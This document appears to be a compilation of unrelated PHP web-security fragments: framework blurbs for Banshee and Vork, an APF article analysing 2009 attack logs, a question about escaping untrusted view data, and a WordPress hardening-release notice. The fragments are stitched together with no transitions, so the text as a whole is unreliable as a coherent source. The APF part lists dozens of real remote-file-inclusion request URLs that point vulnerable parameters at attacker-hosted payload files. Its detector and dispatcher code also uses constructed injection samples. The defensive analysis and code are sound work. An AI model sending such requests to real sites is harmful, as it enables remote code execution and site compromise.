Banshee is a PHP framework whose main focus is security. Several techniques are used to prevent SQL injection, cross-site scripting and cross-site request forgery. Authentication and authorization are handled transparently and simply, so it is hard to make a mistake there. An auditing tool is included to discover security bugs in changed or newly created code.
Banshee uses MVC and XSLT for the view. Database drivers are included for MySQL, PostgreSQL, SQLite and MSSQL. They all have the same API, so switching from one database to another is very easy.
Although Banshee is a framework, a simple but fully functional CMS is included. Ready-to-use modules such as a forum, guestbook, news page, agenda, poll, FAQ page and more are included to save the web developer a lot of time when building a new website.
Also included are easy-to-use libraries for e-mail, POP3, newsletters, crypto, HTTP, pagination, and more.
The Banshee PHP framework website can be found at www.banshee-php.org. An online demo is also available, so exploring Banshee is just a click away.
Vork is an open-source PHP framework designed for rapid development of performance-oriented scalable applications.
The mission of Vork is to provide an MVC architecture and full-featured toolkit in a gimmick-free no-frills approach without adding overhead, creating slow & unscalable abstraction layers or re-inventing native PHP functionality.
In 2009, a drastic increase in XSS and code injection attacks was observed on the APF web site. Analyzing the log files, we found 92,334 known attacks that were caught by the framework, out of a total of 672,152 attacks.
The APF Security Promise: use the APF and profit from its security mechanisms! Applications designed securely from scratch prevent the compromise of your system, guarantee the safety of your users' data and of your reputation, and let you put your mind at ease.
This article describes which mechanisms are included in the APF to face this danger and to secure your custom application.
As described in the article Hacking & das APF (German), most of the attacks are XSS and code injection attacks. They try to exploit vulnerabilities to inject third-party content or code into the target application. Fortunately, the signature is similar in 95% of the attacks. Here is the pattern description:
Only the name of the parameter differs from request to request:
The following code box contains a selection of URLs that have been used to display third-party content on the APF web page or to inject third-party code into the APF:
/!rfihttp://www.nicheresaleprofits.com/cbmarketer/image/id??
/!scan23http://sito.blackdrag0n.net/Cartoon/idnew.txt?
/%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt??
/%20%20//?_shop_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt???
/%20%20//?mosconfig_absolute_path=http://largeface.com/gnuboard4/gnus/fxid.txt?
/%20%20//inc/functions_inc.php?gb_pfad=http://82.146.51.16/scan/copyright.txt??
/%20%20//includes/DProtect/Framework/EmailTemplates.class.php?GLOBALS[RootPath]=http://www.junggosum.com/bbs/data/sports_2/idxx.txt??
/%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://n34.biz/id1.txt???
/%20%20//tools/send_reminders.php?noSet=0&includedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt??
/%20%20/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt?
/?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt????
/?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt??????
/?_zb_path=http://kb27.co.kr/bbs///data/cok.txt??
/tools/send_reminders.php?includedir=http://208.98.22.241/id.txt??%0D??
/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://204.3.167.134/xxx?
/modules/My_eGallery/index.php?basepath=http://urogyn.co.kr/uro/install/idxx.txt??
/show_news.php?cutepath=http://laloggia.by.ru/up/ctrl.txt??
/skin/zero_vote/setup.php?dir=http://206.126.97.21/~talagaho/id.txt???
/Neos_Chronos/header.php?base_folder=http://www.jocainmo.es/img/.z/d??
/buscar.php?query=http://www.candidography.com/id1.txt??
/?_PHPLIB[libdir]=http://cdshop.net.ru////cron/hjr.txt??
/inc/cmses/aedating4CMS.php?dir[inc]=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//colby/id.txt??
/naboard_pnr.php?skin=http://www.cinepopbrasil.com.br/sistem.txt???
/phpSecurePages/secure.php?&cfgProgDir=http://www.steannareptile.it//administrator/idi.txt???
/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://tdaa.by.ru/safe.txt???
/skin/ggambo7002_board/contact.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt??
/jahoot.com/search.php?=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??
/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://laloggia.by.ru/up/ctrl.txt??
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?http://musicadelibreria.net/footer??
/Page//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://kb27.co.kr/bbs///data/cok.txt??
The files xss_report_2009_with_urls_grouped.txt.gz and xss_report_2009_with_urls_uniq.txt.gz contain a variety of URLs that were used in the 2009 attacks: xss_report_2009_with_urls_uniq.txt.gz contains the complete list of URLs, and xss_report_2009_with_urls_grouped.txt.gz contains the list grouped by identical base URL.
After checking Apache's access log files, we started to analyze the application log files. This effort resulted in three groups of attacks. All of them tried to manipulate the URL to inject content or code into the application:
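The common signature of the URLs above is a query parameter whose value is itself an absolute URL pointing at an attacker-controlled text file. As an added example (my own code, not part of the APF article or the APF project), the following script flags request URIs carrying that signature, including nested parameters such as GLOBALS[RootPath] or dir[inc] and the unnamed "?=http://..." form. The sample requests are constructed; hosts and addresses are placeholders. It assumes PHP 7.1 or newer for the type declarations.

```php
<?php
// Added example, not APF code: detect the remote-file-inclusion
// signature described above, i.e. a query parameter whose value is an
// absolute URL. Sample requests below are constructed placeholders.

/**
 * Return the names of query parameters whose value is an absolute URL,
 * or an empty array when the request shows no such parameter.
 */
function rfi_suspect_params(string $requestUri): array
{
    $pos = strpos($requestUri, '?');
    if ($pos === false) {
        return [];
    }
    // Attack URLs are usually padded with trailing "?" characters; strip
    // them so parse_str() sees the intended key/value pairs.
    $query = rtrim(substr($requestUri, $pos + 1), '?');
    parse_str($query, $params);

    $hits = [];
    walk_params($params, '', $hits);

    // parse_str() drops pairs with an empty key ("?=http://..." or a bare
    // "?http://..."); catch those from the raw query string.
    if ($hits === [] && preg_match('#(^|[?&=])(https?|ftp)://#i', $query)) {
        $hits[] = '(unnamed)';
    }
    return $hits;
}

/**
 * Recursively visit nested array parameters such as GLOBALS[RootPath]
 * or dir[inc], which PHP decodes into arrays, and collect the full
 * parameter name of every value that starts with a URL scheme.
 */
function walk_params(array $params, string $prefix, array &$hits): void
{
    foreach ($params as $key => $value) {
        $name = $prefix === '' ? (string) $key : $prefix . '[' . $key . ']';
        if (is_array($value)) {
            walk_params($value, $name, $hits);
        } elseif (preg_match('#^(https?|ftp)://#i', ltrim((string) $value))) {
            $hits[] = $name;
        }
    }
}

/** Map each suspicious request URI to the offending parameter names. */
function scan_requests(array $requests): array
{
    $report = [];
    foreach ($requests as $uri) {
        $hits = rfi_suspect_params($uri);
        if ($hits !== []) {
            $report[$uri] = $hits;
        }
    }
    return $report;
}

// Constructed sample requests, shaped like the log entries above
// (the first one is legitimate and must not be flagged).
$sample = [
    '/index.php?page=news',
    '/?mosConfig_absolute_path=http://payload.example.net/id.txt????',
    '/%20%20//?GLOBALS[RootPath]=http://payload.example.net/idxx.txt??',
    '/tools/send_reminders.php?noSet=0&includedir=http://198.51.100.7/id.txt??%0D??',
    '/search.php?=http://payload.example.net/fx.txt??',
    '/?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://198.51.100.7/xxx?',
];

foreach (scan_requests($sample) as $uri => $hits) {
    printf("RFI signature in %s (parameter: %s)\n", $uri, implode(', ', $hits));
}
```

Run from the command line, the script reports the five manipulated requests and names the parameter in each (for instance autoLoadConfig[999][0][loadFile]) while the legitimate request passes. The same check works as a log-scanning filter over the request field of Apache access log entries, which is how the counts quoted above would be reproduced.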
parse_url(/Seite/048-Webseite-erstellen%20%20/page.php?doc=http://unixstats.org/tools/idxx.txt??): Unable to parse URL (Number: 2, File: ***/apps/tools/link/frontcontrollerLinkHandler.php, Line: 306)
[Document::__loadContentFromFile()] Design "Seite" not existent in namespace "modules::comments::pres::templates"! Please check your template code (<29e6fe038415c51c1bbac0271949edf5 /><a name="comments"></a><h2><html:getstring namespace="modules::comments" config="language" entry="header.title" /></h2><68a3d33630357505bfe4dd96dbcb492e />). (Number: 256, File: ***/apps/core/pagecontroller/pagecontroller.php, Line: 1378)
[Frontcontroller::__parseActions()] No config section for action key "setLangu" available in configuration file "***_actionconfig.ini" in namespace "sites::demosite::biz::actions" and context "sites::***"! (Number: 256, File: ***/apps/core/frontcontroller/Frontcontroller.php, Line: 555)
The first line is an attempt to inject external code. Had the attacker succeeded, the included code would have been used to gather information about the web server and the application running on it. Subsequent requests are then used to manipulate the application and its content directly.
If the developer uses URL rewriting, such attacks are quite worthless, because the InputFilter rewrites the URL into generic parameter/value pairs.
If the developer uses APF components like the LinkHandler or the FrontcontrollerLinkHandler, URLs like those presented above are recognized as semantically invalid and an error is thrown. This error can easily be caught and logged by the integrated error handling.
The second line describes the attempt to manipulate a known parameter of the application in order to display third-party content. In principle, the APF would offer the chance to manipulate the template included by the <core:importdesign /> taglib by changing the URL, but the template path is created with security in mind.
In the third line the attacker tries to manipulate a parameter of a front controller action in order to execute the desired action. Within the APF, actions are defined in a configuration file and the URL parameters only refer to this configuration. Hence, it is not possible to manipulate an action call via the URL.
In order not to give the attacker much information, it is recommended to implement a special ErrorHandler that logs the errors to a log file and keeps quiet about the cause of the error.
The wiki page Script kiddies ErrorHandler (German) describes how you can implement such an ErrorHandler.
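The two defensive ideas in the paragraphs above, action keys that only refer to a configuration and an error handler that logs everything but tells the client nothing, combine into a small dispatcher. The following is an added example written for this page, not APF code: the configuration array, class names and the dispatch() and quiet_log() helpers are assumptions standing in for the APF's action configuration file and its ErrorHandler. It assumes PHP 7.1 or newer.

```php
<?php
// Added example, not APF code: a front-controller style dispatcher in
// which the URL only carries an action *key*. The key is resolved
// against a configuration map, so a manipulated URL cannot name an
// arbitrary class or file. Unknown keys and bad parameters are logged
// with full detail and answered with a generic message.

// Stand-in for the actions configuration file (constructed).
const ACTION_CONFIG = [
    'setLanguage' => ['class' => 'SetLanguageAction'],
    'logout'      => ['class' => 'LogoutAction'],
];

interface Action
{
    public function run(array $params): string;
}

final class SetLanguageAction implements Action
{
    private const ALLOWED = ['de', 'en'];

    public function run(array $params): string
    {
        $lang = $params['lang'] ?? 'en';
        // Whitelist the value; the raw parameter is never echoed back.
        if (!in_array($lang, self::ALLOWED, true)) {
            throw new InvalidArgumentException("unknown language '$lang'");
        }
        return "language set to $lang";
    }
}

final class LogoutAction implements Action
{
    public function run(array $params): string
    {
        return 'logged out';
    }
}

/**
 * Resolve an action key from the request against ACTION_CONFIG and run it.
 * Returns the action's output, or a generic message on any failure, while
 * the real cause goes to the error log only.
 */
function dispatch(string $actionKey, array $params): string
{
    try {
        if (!isset(ACTION_CONFIG[$actionKey])) {
            throw new RuntimeException("no config section for action key '$actionKey'");
        }
        $class = ACTION_CONFIG[$actionKey]['class'];
        if (!class_exists($class, false) || !is_subclass_of($class, Action::class)) {
            throw new RuntimeException("misconfigured action '$actionKey'");
        }
        return (new $class())->run($params);
    } catch (Throwable $e) {
        quiet_log($e, $actionKey, $params);
        return 'The requested page could not be processed.';
    }
}

/**
 * "Script kiddies" style handler: everything useful goes to the log,
 * nothing about the cause reaches the response body.
 */
function quiet_log(Throwable $e, string $actionKey, array $params): void
{
    error_log(sprintf('[%s] %s (action=%s, params=%s, ip=%s)',
        get_class($e), $e->getMessage(), $actionKey,
        json_encode($params), $_SERVER['REMOTE_ADDR'] ?? 'cli'));
}

// Constructed requests: a legitimate one, then two manipulated ones
// (unknown action key; parameter value pointing at an external URL).
echo dispatch('setLanguage', ['lang' => 'de']), "\n";
echo dispatch('setLangu', ['lang' => 'de']), "\n";
echo dispatch('setLanguage', ['lang' => 'http://payload.example.net/id.txt']), "\n";
```

The first call prints "language set to de"; the other two print only the generic message, and the detail ("no config section for action key 'setLangu'", much like the third log line above) appears in the error log. The point of is_subclass_of() is that even a tampered configuration entry cannot instantiate something that is not an Action.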
I have a controller and a view; the data that I'm working with inside the controller can't be trusted (it's drawn from somewhere external, and isn't $_GET or $_POST).
How do I escape the data when printing it in the view to ensure that tags and other things are escaped properly? I'm used to Zend_View's $this->escape($foo), which is used from inside the view, so I'm still trying to get my bearings. My preference is to escape it from within the view, as I use the data, but if that's not an option I'll do it within the controller.
(I've discovered the filtering for $this->input, but as the data isn't coming from $_GET/$_POST it's not much use to me. :-) Unfortunately, the examples I've seen so far have all been using a controller putting static data into an array, which is then passed to the view, e.g. $data['foo'] = 'Example'.)
Any ideas?
Edit: I'm asking because I don't particularly relish using html_entities($str, ENT_QUOTES, 'utf-8') everywhere (along with mb_convert_encoding() and friends), but I guess I'll create a custom helper if needed.
Edit #2: The data is a bunch of strings (that may contain anything from straight alphanumeric characters, to <b>foo</b>, to <script>alert('xsslol');</script>).
I need to escape these strings to print them within, say, table cells, not allowing any HTML tags to be printed (converting tags into their HTML entity equivalents). If I were working with bare PHP, I'd use htmlentities() for this, as per my edit above.
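As an added, framework-agnostic example (my own code, not CodeIgniter's or Zend_View's API), the following shows the kind of helper the question asks for: a short escape function meant to be called from inside the view at output time, applied to untrusted strings like the ones listed in the question. The function names e() and render_table() and the sample rows are assumptions; it assumes PHP 5.4 or newer for ENT_SUBSTITUTE and PHP 7.1 or newer for the type declarations.

```php
<?php
// Added example: an escape helper for views, in the spirit of
// Zend_View's $this->escape($foo), plus a table renderer that uses it.
// Sample data below is constructed.

/**
 * Escape a string for insertion into HTML text or a quoted attribute.
 * ENT_QUOTES also escapes single quotes, ENT_SUBSTITUTE replaces invalid
 * UTF-8 sequences with U+FFFD instead of returning an empty string, and
 * the explicit charset stops PHP from guessing the input encoding.
 */
function e(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Render untrusted rows as table cells. Every cell passes through e(),
 * so tags come out as entity equivalents and display as literal text.
 */
function render_table(array $rows): string
{
    $html = "<table>\n";
    foreach ($rows as $row) {
        $html .= '  <tr>';
        foreach ($row as $cell) {
            $html .= '<td>' . e($cell) . '</td>';
        }
        $html .= "</tr>\n";
    }
    return $html . "</table>\n";
}

// Constructed untrusted data, like the strings described in the question.
$rows = [
    ['plain text', 'alnum123'],
    ['<b>foo</b>', "<script>alert('xsslol');</script>"],
    ['Tom & Jerry', '"quoted" value'],
    ["bad bytes: \xC3\x28", 'ok'], // invalid UTF-8 sequence, replaced with U+FFFD
];

echo render_table($rows);
```

In the output, <b>foo</b> becomes &lt;b&gt;foo&lt;/b&gt; and the script tag's single quotes become &#039;, so nothing executes. htmlspecialchars() is enough here rather than htmlentities(): once the page is served as UTF-8, non-ASCII characters need no entity encoding, only the five HTML-significant ones do, which also removes the need for mb_convert_encoding() on the way out. Note that this escaper covers HTML text and quoted attribute values only; data placed inside a JavaScript block or a URL needs a context-specific encoder instead.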
As you know, over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on making WordPress as secure as possible, and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch, so as to get these improvements out there and make all your sites as secure as possible.
The headline changes in this release are:
We recommend that all sites be upgraded to this new version of WordPress to ensure that you have the best available protection.
If you think your site may have been hit by one of the recent exploits and you would like to make sure that you have cleared out all traces of the exploit, we recommend that you take a look at the WordPress Exploit Scanner. This is a plugin which searches the files on your website, and the posts and comments tables of your database, for anything suspicious. It also examines your list of active plugins for unusual filenames. You can read more about this plugin here: “WordPress Exploit Scanner”.